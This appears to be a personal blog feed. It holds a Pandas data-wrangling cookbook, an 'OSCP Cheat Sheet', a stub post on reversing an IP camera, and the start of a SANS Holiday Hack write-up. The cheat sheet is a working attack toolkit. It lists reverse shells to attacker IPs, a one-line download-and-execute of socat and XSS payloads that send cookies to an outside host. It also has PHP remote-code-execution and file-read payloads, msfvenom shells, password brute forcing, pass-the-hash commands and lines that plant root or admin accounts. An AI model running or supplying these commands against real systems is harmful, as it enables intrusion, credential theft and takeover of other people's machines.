H4ck and that

Pandas Cookbook Part 2 (Assessing/Wrangling)

2019-04-12T16:00:00+00:00

After finishing my Udacity DataAnalyst Nanodegree I want to preserve my obtained skills using Pandas. Therefore I created a mixture of Cheat Sheet and Cookbook to go over several usecases. Maybe you will find it useful. This is Part 2 and is about Assessing and Wrangling in Pandas. I’m aiming at adding more content if I find something interesting. By The Way, although it’s Part 2 it’s the first part, as it was the easiest to collect and present the content in a readable way.

import pandas as pd
import numpy as np

Assessing

wrangling_df = pd.read_csv("patients.csv")
wrangling_df.shape

(503, 14)

wrangling_df.head()

	patient_id	assigned_sex	given_name	surname	address	city	state	zip_code	country	contact	birthdate	weight	height	bmi
0	1	female	Zoe	Wellish	576 Brown Bear Drive	Rancho California	California	92390.0	United States	[email protected]	7/10/1976	121.7	66	19.6
1	2	female	Pamela	Hill	2370 University Hill Road	Armstrong	Illinois	61812.0	United States	[email protected]+1 (217) 569-3204	4/3/1967	118.8	66	19.2
2	3	male	Jae	Debord	1493 Poling Farm Road	York	Nebraska	68467.0	United States	[email protected]	2/19/1980	177.8	71	24.8
3	4	male	Liêm	Phan	2335 Webster Street	Woodbridge	NJ	7095.0	United States	[email protected]+1 (732) 636-8246	7/26/1951	220.9	70	31.7
4	5	male	Tim	Neudorf	1428 Turkey Pen Lane	Dothan	AL	36303.0	United States	[email protected]	2/18/1928	192.3	27	26.1

Summarize boolean occurences

By multiplying a boolean with one, we can turn it into a integer and are able to sum up all occurences:

(1*(wrangling_df['given_name'] == "Jake")).sum()

Get Column Keys

Save column names into a list:

wrangling_df.keys()[-3:].tolist()

[‘weight’, ‘height’, ‘bmi’]

Filtering

Retrieve categorical values based on occurence limit in dataframe:

[x for x,y in list(wrangling_df['height'].value_counts().iteritems()) if y > 30]
# the result will express the heights, that occured more than thirty times in the dataframe

[67, 69, 65, 63, 66, 70, 72, 61]

Return values for column where value starts with specific string. Using List Comprehension and a classical for loop to go over a DataFrame column:

[row for row in wrangling_df['given_name'] if row.startswith('David')]

[‘David’, ‘David’]

Using pandas built-in iterrows will run much faster, as it won’t call the complete Pandas Object on every loop iteration:

[row[1][2] for row in wrangling_df.iterrows() if row[1][2].startswith('David')]

[‘David’, ‘David’]

Wrangling

Cleaning

Duplicates and NaN values

Identify duplicated and null values in address column:

wrangling_df[((wrangling_df.address.duplicated()) & wrangling_df.address.notnull())].head(1)

	patient_id	assigned_sex	given_name	surname	address	city	state	zip_code	country	contact	birthdate	weight	height	bmi
29	30	male	Jake	Jakobsen	648 Old Dear Lane	Port Jervis	New York	12771.0	United States	[email protected]+1 (845) 858-7707	8/1/1985	155.8	67	24.4

Remove these values:

clean_df = wrangling_df[~((wrangling_df.address.duplicated()) & wrangling_df.address.notnull())].head(1)

Remove Columns/Values

Drop

Drop rows with NaN values depending on subset of columns:

wrangling_df.dropna().shape

(491, 14)

wrangling_df.dropna(subset = ['surname']).shape

(503, 14)

Drop whole columns:

wrangling_df.drop(columns=['contact','birthdate']).shape

(503, 12)

Create Columns

Categorical Column

We can create a categorical column that will only allow these values to insert:

wrangling_df['illness'].index

KeyError: 'illness'

wrangling_df['illness'] = pd.Series(pd.Categorical(values=["none"]*len(wrangling_df),categories=["none","a bit","intermediate","very ill"]))

wrangling_df['illness'][0] = "bad"

ValueError: Cannot setitem on a Categorical with a new category, set the categories first

wrangling_df['illness'][0] = "intermediate"

Rename Columns

wrangling_df_2 = wrangling_df.copy()

Different Methods to add suffix to column names

Use built-in pandas functions:

wrangling_df_2 = wrangling_df_2.add_suffix('X')
wrangling_df_2 = wrangling_df_2.add_prefix('X')
wrangling_df_2.head(1)

	Xpatient_idX	Xassigned_sexX	Xgiven_nameX	XsurnameX	XaddressX	XcityX	XstateX	Xzip_codeX	XcountryX	XcontactX	XbirthdateX	XweightX	XheightX	XbmiX	XillnessX
0	1	female	Zoe	Wellish	576 Brown Bear Drive	Rancho California	California	92390.0	United States	[email protected]	7/10/1976	121.7	66	19.6	intermediate

Use rename and formatter or lambda for renaming all columns:

wrangling_df_2.rename(columns='{}Y'.format, inplace=True)
wrangling_df_2.rename(columns = lambda x: x+'Z', inplace=True)
wrangling_df_2.head(1)

	Xpatient_idXYZ	Xassigned_sexXYZ	Xgiven_nameXYZ	XsurnameXYZ	XaddressXYZ	XcityXYZ	XstateXYZ	Xzip_codeXYZ	XcountryXYZ	XcontactXYZ	XbirthdateXYZ	XweightXYZ	XheightXYZ	XbmiXYZ	XillnessXYZ
0	1	female	Zoe	Wellish	576 Brown Bear Drive	Rancho California	California	92390.0	United States	[email protected]	7/10/1976	121.7	66	19.6	intermediate

wrangling_df_2 = wrangling_df.copy()

Use list comprehensions or the map function to do the job:

wrangling_df_2.columns = [column + 'X' for column in wrangling_df_2.columns]
wrangling_df_2.columns = list(map(lambda s: s+'Y', wrangling_df_2.columns))
wrangling_df_2.head(1)

	patient_idXY	assigned_sexXY	given_nameXY	surnameXY	addressXY	cityXY	stateXY	zip_codeXY	countryXY	contactXY	birthdateXY	weightXY	heightXY	bmiXY	illnessXY
0	1	female	Zoe	Wellish	576 Brown Bear Drive	Rancho California	California	92390.0	United States	[email protected]	7/10/1976	121.7	66	19.6	intermediate

Change Values

Lamdba/Apply Functions

Using a If-Else function. We have to remember, a lambda function has to generate a return value for every iteration, therefore the else is mandatory:

wrangling_df['height_result'] = wrangling_df['height'].apply(lambda x: "extrem height" if (x > 67) or (x < 60) else "normal height")
wrangling_df.head(5)

	patient_id	assigned_sex	given_name	surname	address	city	state	zip_code	country	contact	birthdate	weight	height	bmi	illness	height_result
0	1	female	Zoe	Wellish	576 Brown Bear Drive	Rancho California	California	92390.0	United States	[email protected]	7/10/1976	121.7	66	19.6	intermediate	normal height
1	2	female	Pamela	Hill	2370 University Hill Road	Armstrong	Illinois	61812.0	United States	[email protected]+1 (217) 569-3204	4/3/1967	118.8	66	19.2	none	normal height
2	3	male	Jae	Debord	1493 Poling Farm Road	York	Nebraska	68467.0	United States	[email protected]	2/19/1980	177.8	71	24.8	none	extrem height
3	4	male	Liêm	Phan	2335 Webster Street	Woodbridge	NJ	7095.0	United States	[email protected]+1 (732) 636-8246	7/26/1951	220.9	70	31.7	none	extrem height
4	5	male	Tim	Neudorf	1428 Turkey Pen Lane	Dothan	AL	36303.0	United States	[email protected]	2/18/1928	192.3	27	26.1	none	extrem height

Use dict to change values programmatically

For better performance it’s always advisable to use a apply function, instead a for loop:

# Mapping from full state name to abbreviation
state_abbrev = {'California': 'CA',
                'New York': 'NY',
                'Illinois': 'IL',
                'Florida': 'FL',
                'Nebraska': 'NE'}

# Function to apply
def abbreviate_state(patient):
    if patient['state'] in state_abbrev.keys():
        abbrev = state_abbrev[patient['state']]
        return abbrev
    else:
        return patient['state']
    
wrangling_df['state'] = wrangling_df.apply(abbreviate_state, axis=1)
wrangling_df.head(5)

	patient_id	assigned_sex	given_name	surname	address	city	state	zip_code	country	contact	birthdate	weight	height	bmi	illness	height_result
0	1	female	Zoe	Wellish	576 Brown Bear Drive	Rancho California	CA	92390.0	United States	[email protected]	7/10/1976	121.7	66	19.6	intermediate	normal height
1	2	female	Pamela	Hill	2370 University Hill Road	Armstrong	IL	61812.0	United States	[email protected]+1 (217) 569-3204	4/3/1967	118.8	66	19.2	none	normal height
2	3	male	Jae	Debord	1493 Poling Farm Road	York	NE	68467.0	United States	[email protected]	2/19/1980	177.8	71	24.8	none	extrem height
3	4	male	Liêm	Phan	2335 Webster Street	Woodbridge	NJ	7095.0	United States	[email protected]+1 (732) 636-8246	7/26/1951	220.9	70	31.7	none	extrem height
4	5	male	Tim	Neudorf	1428 Turkey Pen Lane	Dothan	AL	36303.0	United States	[email protected]	2/18/1928	192.3	27	26.1	none	extrem height

Normalize, Extrapolate, Interpolate

Normalize each row by the sum of each row:

df = pd.DataFrame([[1,2,3],[3,4,5]])
df.div(df.sum(axis=1), axis=0)

	0	1	2
0	0.166667	0.333333	0.500000
1	0.250000	0.333333	0.416667

Interpolate automatically using SciPy:

from scipy.interpolate import interp1d

m = interp1d([1,10],[1,100])
int(m(10))

Interpolate manually:

ser = pd.Series([1,2,3,4])
100*(ser - ser.min()) / (ser.max() - ser.min())

    0.000000
   33.333333
   66.666667
  100.000000
dtype: float64

Extrapolate automatically using SciPy:

m = interp1d([1,100],[1,10],fill_value="extrapolate")
int(m(95))

Insert Values

Appending, Concat

Append rows to dataframe from noncomplete dict:

app_dict = {'patient_id':wrangling_df['patient_id'].max()+1,
            'given_name':'testuser',
            'surname':'blahblah'}

new_row = pd.DataFrame([app_dict],columns=app_dict.keys())

pd.concat([wrangling_df,new_row], sort=True).reset_index().tail(3)

	index	address	assigned_sex	birthdate	bmi	city	contact	country	given_name	height	height_result	illness	patient_id	state	surname	weight	zip_code
501	501	3652 Boone Crockett Lane	female	2/13/1952	27.7	Seattle	[email protected] 360 443 2060	United States	Chidalu	67.0	normal height	none	502	WA	Onyekaozulu	176.9	98109.0
502	502	2778 North Avenue	male	5/3/1954	19.3	Burr	[email protected]	United States	Pat	71.0	extrem height	none	503	NE	Gersten	138.2	68324.0
503	0	NaN	NaN	NaN	NaN	NaN	NaN	NaN	testuser	NaN	NaN	NaN	504	NaN	blahblah	NaN	NaN

loc

Create masks to insert specific values:

height_mean = wrangling_df.height.mean()
mask = wrangling_df.patient_id == 4509
column_name = 'height'
wrangling_df.loc[mask, column_name] = height_mean * 1.5

Cut and Seperate

iloc

We can extract multiple columns and rows at once by combining iloc and numpy.r_:

df_cut = wrangling_df.iloc[np.r_[:5,10:15], np.r_[1, 3]]
df_cut.shape

(10, 2)

Merge, Group And Sum Values

Summarize categorical values

Find from a list of mutations of all combinations of categorical values where at least 4 are positive:

categories = ["C006_01","C006_02","C006_04","C006_06","C006_07","C006_10"]
all_muts = list(itertools.combinations(categories, 4))

f_s = 'is correct'
result_df = pd.DataFrame()

for m in all_muts:
    temp_df = umfrage_df[(umfrage_df[m[0]] == f_s) & (umfrage_df[m[1]] == f_s) & (umfrage_df[m[2]] == f_s) & (umfrage_df[m[3]] == f_s)]
    result_df = result_df.append(temp_df)

Sum multiple categorical questions with the same range into one continuous value:

def merge_categorical(df,col_str,rating_dict):
    
    filter_col = [col for col in df if col.startswith(col_str)]
    subset_df = df[filter_col].fillna(0)
    norm_value = len(filter_col)
    subset_df['sum'] = subset_df.apply(lambda x: (sum([rating_dict[y] for y in x[filter_col]]))/norm_value , axis=1)
    
    return subset_df

rating_dict_freq_lesson = {"Every Lesson":4,"Most Lessons":3,"Some Lessons":2,"Never or Hardly Ever":1,0:0}

teacher_practice = merge_categorical(pisa_df,"ST79Q",rating_dict_freq_lesson)

Merging

Merging two dataframes depending on multiple keys:

wrangling_df.shape

(503, 16)

treatment_df = pd.read_csv("treatments.csv")
wrangling_df.merge(treatment_df,how='outer',left_on=['given_name','surname'],right_on=['given_name','surname']).shape

(783, 21)

It seems that none of the group of keys does match the new Dataframe. Therefore the length of the treatments will be appended and the resulting dataframe will be the sum of both Dataframes.

Melting

The powerful function from pandas melt, makes it possible to unite multiple categorical columns into one:

melt_df = wrangling_df.melt(id_vars = ['patient_id','surname'], 
                  value_vars = ['height', 'weight'], 
                  var_name = 'body_indicator', 
                  value_name = 'body')

melt_df[melt_df.patient_id == 1]

	patient_id	surname	body_indicator	body
0	1	Wellish	height	66.0
503	1	Wellish	weight	121.7

It doesn’t really make sense to do this transformation, but it shows the purpose of melt in a good way.

Groupby

Create Dataframe that will count occurences grouped by another value. The resulting construct can be converted to DataFrame using unstack:

patients_country = wrangling_df.groupby(by=['country'])['state'].value_counts().sort_index()
patients_country.unstack(1)

state	AK	AL	AR	AZ	CA	CO	CT	DC	DE	FL	...	SC	SD	TN	TX	VA	VT	WA	WI	WV	WY
country
United States	1	9	4	4	60	4	5	2	3	22	...	5	3	9	32	11	2	8	10	3	1

1 rows × 49 columns

Regex Use-Cases

Extract

Often multiple interesting values are concatenated in one string column. We can use Regex to extract them:

wrangling_df['phone_number'] = wrangling_df.contact.str.extract('((?:\+\d{1,2}\s)?\(?\d{3}\)?[\s.-]?\d{3}[\s.-]?\d{4})', expand=True)
wrangling_df['email'] = wrangling_df.contact.str.extract('([a-zA-Z][a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.][a-zA-Z]+)', expand=True)

Find and Replace

Reverse every lowercase alphabetic word:

repl = lambda m: m.group(0)[::-1]
pd.Series(['foo 123', 'bar baz', np.nan]).str.replace(r'[a-z]+', repl)

  oof 123
  rab zab
      NaN
dtype: object

Use Regex Groups:

pat = r"(?P<one>\w+) (?P<two>\w+) (?P<three>\w+)"
repl = lambda m: m.group('one').upper()
pd.Series(['one two three', 'foo bar baz']).str.replace(pat, repl)

0    ONE
1    FOO
dtype: object

Return function to return clean values for every Regex outcome:

import re
reg_df = pd.DataFrame(["blah","blubb","blach","blhab","asdblaheh"], columns=['test'])

def regex_filter(val):
    if val:
        mo = re.search("blah",val)
        if mo:
            return True
        else:
            return False
    else:
        return False

reg_df[reg_df['test'].apply(regex_filter)]

	test
0	blah
4	asdblaheh

Change Phone Number Format with Replace and Padding (Before):

wrangling_df.phone_number[:5]

       951-719-9170
  +1 (217) 569-3204
       402-363-6804
  +1 (732) 636-8246
       334-515-7487
Name: phone_number, dtype: object

(After):

wrangling_df.phone_number.str.replace(r'\D+', '').str.pad(11, fillchar='1')[:5]

  19517199170
  12175693204
  14023636804
  17326368246
  13345157487
Name: phone_number, dtype: object

Change Zip Code Format using Replace and Padding (Before):

wrangling_df.zip_code[:5]

  92390.0
  61812.0
  68467.0
   7095.0
  36303.0
Name: zip_code, dtype: float64

wrangling_df.zip_code.astype(str).\
str[:-2].\
str.pad(5, fillchar='0').\
replace('0000n', np.nan)[:5] 

  92390
  61812
  68467
  07095
  36303
Name: zip_code, dtype: object

OSCP Cheat Sheet

2018-09-30T16:00:00+00:00

Reverse Shells

# bash
bash -i >& /dev/tcp/192.168.100.113/4444 0>&1

#sh
rm -f /tmp/p; mknod /tmp/p p && nc <attacker-ip> 4444 0/tmp/p

#telnet
rm -f /tmp/p; mknod /tmp/p p && telnet <attacker-ip> 80 0/tmp/p

# python
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("ATTACKING-IP",80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

# perl 
perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

Elevate shell

python -c 'import pty; pty.spawn("/bin/bash")'

# attacker listener
socat file:`tty`,raw,echo=0 tcp-listen:4444  

# victim reverse shell
socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<host-ip>:4444  

# download and execute in one line
wget -q https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat -O /tmp/socat; chmod +x /tmp/socat; /tmp/socat exec:'bash -li',pty,stderr,setsid,sigint,sane tcp:<host-ip>:4444  

Web

Directory Traversal

dotdotpwn -m http -h <host-ip> -o windows

# create list with directories
dotdotpwn -m stdout -d 8 -o windows > ddp_traversal

XSS

'">><script>i=document.createElement("img");i.src='http://10.11.0.61:5555/'+document.cookie;</script>


<script>
new Image().src="http://10.11.0.61:81/bogus.php?output="+document.cookie;
</script>

File Inclusion

# check vor DAV upload vulns
davtest -url <host-ip> -move

Using curl

curl -X PUT http://website:8080/test.jsp/ -d @- < test.jsp

curl --cookie "JSESSIONID=CFD11DB259AABD57E38AE7ED5935B691" -X PUT http://website:8080/test.jsp/
-d @- < test.jsp

Using PHP

curl -s --data "<?system('ls -la');?>" "http://website/admin.php?ACS_path=php://input%00"

Sometimes only traffic on web port allowed

curl -s --data "<? shell_exec('bash -i >& /dev/tcp/10.11.0.61/443 0>&1') ?>" "http://website/admin.php?ACS_path=php://input%00

Read files from system

https://website/section.php?page=php://filter/convert.base64-encode/resource=/etc/passwd%00

Using kadismus

./kadimus -t https://website/section.php?page=php://input%00 --inject-at page -C '<?php echo "pwned"; ?>' -X input

Reverse shell payloads

<?php shell_exec("bash -i >& /dev/tcp/10.11.0.61/5555 0>&1") ?>

<?php shell_exec("nc -e /bin/sh 10.11.0.61 5555") ?>

<?php $sock=fsockopen("10.11.0.61",5555);exec("/bin/sh -i <&3 >&3 2>&3"); ?>

SQLi

SQLmap

sqlmap -u "http://website/wp/wp-content/plugins/wp-forum/feed.php?topic=-4381 " --dbms=mysql --technique=U --union-cols=7 --random-agent --dump

sqlmap -u "http://website/edit_period.php?period_id=1 " --cookie="PHPSESSID=h7gtd8seldqt6vfa9igebn4tu1" --dbms=mysql --level=5 --risk=3

Service Cracking & Enumeration

RDP

ncrack -vv --user offsec -P password-file.txt rdp://<host-ip>
```bash

SSH

```bash
hydra -l root -P password-file.txt <host-ip> ssh

FTP

Check wordlist over multiple hosts

hydra -M ftp_hosts_open.txt -l administrator -P /usr/share/john/password.lst ftp

SNMP

hydra -P password-file.txt -v <host-ip> snmp

# enumerate entire MIB tree
snmpwalk -c public -v1 <host-ip>

# enumerate windows users
snmpwalk -c public -v1 <host-ip> 1.3.6.1.4.1.77.1.2.25

# enumerate running windows processes
snmpwalk -c public -v1 <host-ip> 1.3.6.1.2.1.25.4.2.1.2

# enumerate open TCP ports
snmpwalk -c public -v1 <host-ip> 1.3.6.1.2.1.6.13.1.3

# enumerate installed software
snmpwalk -c public -v1 <host-ip> 1.3.6.1.2.1.25.6.3.1.2

# snmpwalk over list of ip's
while read -r line;
        do `snmpwalk -c public -v1 $line 1.3.6.1.4.1.77.1.2.25 > "$line"_users.txt`
done < ip_list.txt

DNS

#Forward DNS Lookup Brute Force
for ip in $(cat subdomain_list.txt);do host $ip.megacorpone.com;done

#Reverse DNS Lookup Brute Force
for ip in $(seq 155 190);do host 50.7.67.$ip;done |grep -v "not found"

#Script for doing zone transfer
for server in $(host -t ns $1 |cut -d" " -f4)
do
        host -l $1 $server |grep "has address"
done

#dnsrecon
dnsrecon -d megacorpone.com -t axfr

LDAP

ldapsearch -h <host-ip> -p 389 -w <password> -x -b "dc=<domain>,dc=local

AJP

nmap -p 8009 <host-ip> --script ajp-brute

nmap -p 8009 <host-ip> --script ajp-request --script-args method=GET

NetBios

nbtscan <host-ip>

SMB

smbmap -d <domain> -H <host-ip> -R

mount -t cifs "//<ip-address>/Share" smbmount

smbclient "\\\\<ip-address>\Share"

RPC

rpcclient <ip address> -U “” -N

rpcinfo -p <target ip>

Password Cracking

TightVNC

C:\Users\ADMINI~1\Desktop\Tools>vncpwd.exe 2151D3722874AD0C

*VNC password decoder 0.2
by Luigi Auriemma
e-mail: aluigi@autistici.org
web:    aluigi.org

- your input password seems in hex format (or longer than 8 chars)

  Password:   <password>

SAM

pwdump system SAM

Password Bruteforce

HTTP

medusa -h <host-ip> -u {jeff,admin} -P mega-mangled -M http -n 80 -m DIR:/xampp -T 3

RDP

ncrack -vv --user administrator -P ~/PASSWD/mega-mangled rdp://<host-ip>

python crowbar.py -b rdp -s <host-ip>/32 -U ~/targets/0_usernames -C ~/targets/0_passwords

Msfvenom Payloads

# if exes aren't allowed to upload or not executable a vbs script could be useful
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.11.0.61 LPORT=6666 EXITFUNC=thread -f loop-vbs

msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.61 LPORT=18999 -f python -e x86/shikata_ga_nai -b "\x00\x0a\x0d"

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.11.0.61 LPORT=6666 EXITFUNC=process -e PexFnstenvSub -f python

msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.11.0.61 LPORT=6666 -b "\x00\x3a\x26\x3f\x25\x23\x20\x0a\x0d\x2f\x2b\x0b\x5c\x3d\x3b\x2d\x2c\x2e\x24\x25\x1a" -e PexAlphaNum -f python

# perl windows reverse shell
msfvenom -p windows/shell_reverse_tcp LPORT=6666 LHOST=10.11.0.61 -e x86/shikata_ga_nai -b "\x00\x0a\x0d" -f perl

# javascript payload
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.61 LPORT=444 -f js_le -e generic/none

Local Privilege Escalation

Windows

Files containing passwords

# has to be decrypted with gpp-decrypt
C:\Windows\SYSVOL\sysvol\<domain-name>\Policies\{43383995-A780-486C-83E1-469CB7FF2BF4}\Machine\Preferences\Groups>more Groups.xml

C:\Windows\repair\SAM && C:\Windows\repair\system

Hash Injection

pth-winexe -U Administrator%aad3b435b51404eeaad3b435b51404ee:175a592f3b0c0c5f02fad40c51412d3a //<host-ip> cmd.exe

mimikatz # sekurlsa::pth /user:Administrateur /domain:<domain> /ntlm:cc36cf7a8514893efccd332446158b1a

xfreerdp /u:Administrator /pth:aad3b435b51404eeaad3b435b51404ee:e101cbd92f05790d1a202bf91274f2e7 /v:<host-ip> -O

User and Domains

net view /DOMAIN:WORKGROUP
net group "Domain Admins"
net localgroup "Administrators"

Add admin user

net user /add low <password>
net localgroup administrators low /add

Insecure Files and Services

#include <stdlib.h> /* system, NULL, EXIT_FAILURE */
int main ()
{
        int i;
        i=system ("net localgroup administrators low /add");
        return 0;
}

// compile with i686-w64-mingw32-gcc

# show user rights for file 
icacls scsiaccess.exe

# finding services that user robert is allowed to modify
accesschk.exe -uwcqv "robert" * /accepteula

# finding scheduled services
schtasks /query /fo LIST /v

# link running processes to started services
tasklist /SVC

# search for specific filetypes with string password
findstr /si password *.xml *.ini *.txt

# grepping dir for specific strings
dir /s *pass* == *cred* == *vnc* == *.config*

# connect null session
net use \\<ip-address>\$Share “” /u:””

Registry

reg query HKLM\SYSTEM\CurrentControlSet\Services

# grep registry for passwords
reg query HKCU /f password /t REG_SZ /s
reg query HKLM /f password /t REG_SZ /s

# TightVNC server
reg query HKLM\Software\TightVNC\Server

sc

sc qc Spooler

sc config "Spooler" binpath= "net user <username> <password> /add"

net start upnphost

wmic

wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """

wmic service list full

wmic /output:c:\Inetpub\wwwroot\services.txt service lst /format:hform

See open ports with running services:

# see ports with running PID's
netstat -ano

# see matching services to PID's
tasklist

Linux

Users

Bash script for adding user with admin rights

#!/bin/sh
/usr/sbin/adduser agentcooper
/usr/bin/passwd agentcooper
/usr/sbin/usermod -aG root agentcooper

It’s often difficult tu use built-in utilities within limited shell, more robust to simply add strings to files:

#!/bin/sh
echo "agentcooper:\$1\$AbCD4536\$ujyfop5giNd2eAFbEo0o6/:16903:0:99999:7:::" >> /etc/shadow
echo "agentcooper:x:0:0:::/bin/bash" >> /etc/passwd
echo "agentcooper:x:0:" >> /etc/group

Insecure files and Services

Find writable directories

find / -type d \( -perm -g+w -or -perm -o+w \) -exec ls -adl {} \;

See ports with services

netstat -tulpn`

Access

File Transfer

Create VBS based wget tool for windows

echo strUrl = WScript.Arguments.Item(0) > wget.vbs
echo StrFile = WScript.Arguments.Item(1) >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DEFAULT = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PRECONFIG = 0 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_DIRECT = 1 >> wget.vbs
echo Const HTTPREQUEST_PROXYSETTING_PROXY = 2 >> wget.vbs
echo Dim http, varByteArray, strData, strBuffer, lngCounter, fs, ts >> wget.vbs
echo Err.Clear >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set http = CreateObject("WinHttp.WinHttpRequest.5.1") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("WinHttp.WinHttpRequest") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("MSXML2.ServerXMLHTTP") >> wget.vbs
echo If http Is Nothing Then Set http = CreateObject("Microsoft.XMLHTTP") >> wget.vbs
echo http.Open "GET", strURL, False >> wget.vbs
echo http.Send >> wget.vbs
echo varByteArray = http.ResponseBody >> wget.vbs
echo Set http = Nothing >> wget.vbs
echo Set fs = CreateObject("Scripting.FileSystemObject") >> wget.vbs
echo Set ts = fs.CreateTextFile(StrFile, True) >> wget.vbs
echo strData = "" >> wget.vbs
echo strBuffer = "" >> wget.vbs
echo For lngCounter = 0 to UBound(varByteArray) >> wget.vbs
echo ts.Write Chr(255 And Ascb(Midb(varByteArray,lngCounter + 1, 1))) >> wget.vbs
echo Next >> wget.vbs
echo ts.Close >> wget.vbs

Linux

SSH

Port Forwarding via Socks Proxy

# Creating Socks Proxy with SSH
ssh -o ServerAliveInterval=60 -D 127.0.0.1:8888 [email protected]

# Doing Web based requests using the created socks proxy
curl --socks5 localhost:8888 http://<host-ip>

# By editing proxychains config can be used for nearly any tool
proxychains nmap -sT -Pn --top-ports=20 <host-ip>

RDP

xfreerdp /u:<user> /d:WORKGROUP /p:<password> /v:<host-ip>

psexec

winexe -U <user>%<password> //<host-ip> cmd.ex

Windows

plink

Forward ports to attacker machine:

plink.exe -l root <host-ip> -R 8443:127.0.0.1:8443 -R 8014:127.0.0.1:8014 -R 9090:127.0.0.1:9090

nc ncat netcat

# start encrypted bind shell on port 444
ncat --exec cmd.exe --allow 10.11.0.61 -vnl 4444 --ssl

# connect to this shell
ncat -v <host-ip> 4444 --ss

Tools

mimikatz

#dump all passwords
sekurlsa::logonPasswords full

openssl

# creating MD5 linux hash
openssl passwd -1 -salt AbCD4536 <password>

psexec

# create remote cmd shell on another host
psexec \\<host-ip> -u <domain\\user> -p <password> cmd

Powershell

# Invoke Powershell script without changing cmd context
powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}"

nmap

nmap -sT --script whois-ip,ssh-hostkey,banner,dns-zone-transfer,ftp-bounce,ftp-syst,ftp-anon
,finger,pptp-version,http-apache-negotiation,http-apache-server-status,http-aspnet-debug,http-auth-finder,http-auth
,http-awstatstotals-exec,http-backup-finder,http-bigip-cookie,http-config-backup,http-devframework,http-headers,htt
p-iis-webdav-vuln,http-internal-ip-disclosure,http-methods,http-mobileversion-checker,http-open-proxy,http-php-vers
ion,http-robots.txt,http-robtex-shared-ns,http-security-headers,http-shellshock,http-title,http-vhosts,http-enum,im
ap-capabilities,imap-ntlm-info,ms-sql-empty-password,ms-sql-info,ms-sql-ntlm-info,mysql-info,mysql-empty-password,m
ysql-databases,mysql-variables,mysql-enum,pop3-capabilities,pop3-ntlm-info,rusers,smb-ls,smb-mbenum,smb-protocols,s
mtp-commands,smtp-ntlm-info,smtp-open-relay,smtp-strangeport,ssl-cert,ssl-cert-intaddr,ssl-date,vnc-info,vnc-title
<host-ip>

nmap -Pn -p- -vv <ip address>
nmap -Pn -p- -sU -vv <ip address>
nmap -Pn -sV -O -pT:{TCP ports},U:{UDP ports} -script *vuln* <ip address>

Compiling

# create shared library
gcc overwrite_puts.c -o overw_puts -shared -fPIC

# crosscompiling from linux to exe for 32-bit
i686-w64-mingw32-gcc 646.c -lws2_32 -o 646.exe

Grep

# grep for IP addresses
grep -oE "[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}"

Tcpdump

# using -X to output raw traffic
tcpdump -nX -r password_cracking_filtered.pcap | grep -A10 GET

Tcpdump-Filter

# extract IP addresses from pcap
tcpdump -n -r dump.pcap | awk -F" " '{print $3}' | sort -u | head`

# filter for http requests
tcpdump -A -s 0 'tcp port 10443 and (((ip[2:2] - ((ip[0]&0xf)<<2)) - ((tcp[12]&0xf>>2)) != 0)' -i eth0

# filter destination host
tcpdump -n dst host 172.16.40.10 -r password_cracking_filtered.pcap

# filter for source host
tcpdump -n src host 172.16.40.10 -r password_cracking_filter

# filter port
tcpdump -n port 81 -r password_cracking_filtered.pcap

# extract only ACK and PUSH packets
tcpdump -A -n 'tcp[13] = 24' -r password_cracking_filtered.pcap

iptables

# create traffic counter for specific net
iptables -N subnet_scan
iptables -A INPUT -d 10.11.1.0/24 -j subnet_scan
iptables -vL INPUT

Hacking An IPCamera Part2

2018-01-09T16:00:00+00:00

As I assume, that the npc binary holds the gSoup service, I will try to emulate it for easier debugging and reversing. Trying to emulate the npc service:

sudo chroot . ./qemu-arm-static -g 2222 ./bak/npc/npc &

Will result in this errors:

open  hi_gpio device error
open  hi_gpio device error
open  hi_gpio device error
open  hi_gpio device error
Unsupported ioctl: cmd=0x0003
fgCmosWorkUp: error:  regctl ioctl fail 

Afterwards execution will stop. It tries to access the gpio pins and triggers some sysexit. To set up my environment I will try to execute a SSH server on the IPCam to enable debugging via gdbremote on the IPCam. Before doing this I have to do some further reversing of this binary to hopefully reveal some secrets about it’s communication.

Searching for “soap” strings in the binary only matches occurences in the .text sector. So I have to find out, when are this strings referenced.

To be continued…

SANS Holiday Hacking Challenge

2018-01-04T16:00:00+00:00

Overview
1 Terminal Challenges
2 Apache Struts Server
3 Network Reconnaisance & SMB Server
Windows SMB Server
Mail Server with custom Cookie based encryption
Online Resource Management with XML External Entity (XXE) Vulnerability
Database with XSS Vulnerability, JavaScript Web Token (JWT) Vulnerability and LDAP Injection Vulnerability
- XSS
- JWT

Overview

I will cut the lovely story behind the hacking tasks short. The homebase of Santa Clause is threatened by Giant Snowballs. Someone or something is throwing these snowballs onto the peaceful christmastown and you have to find out what’s going on. To get some hints you have to solve some terminal challenges. That are web emulated shells with a given task. For solving these tasks one of the busy christmals elves will give you hints for the main tasks.

1 Terminal Challenges

Isit42 (Overwrite C-Functions with Preload) Wunorse Openslae

Opening the Terminal will welcome you with the description for the challenge:

Wunorse Openslae has a special challenge for you.
Run the given binary, make it return 42.
Use the partial source for hints, it is just a clue.
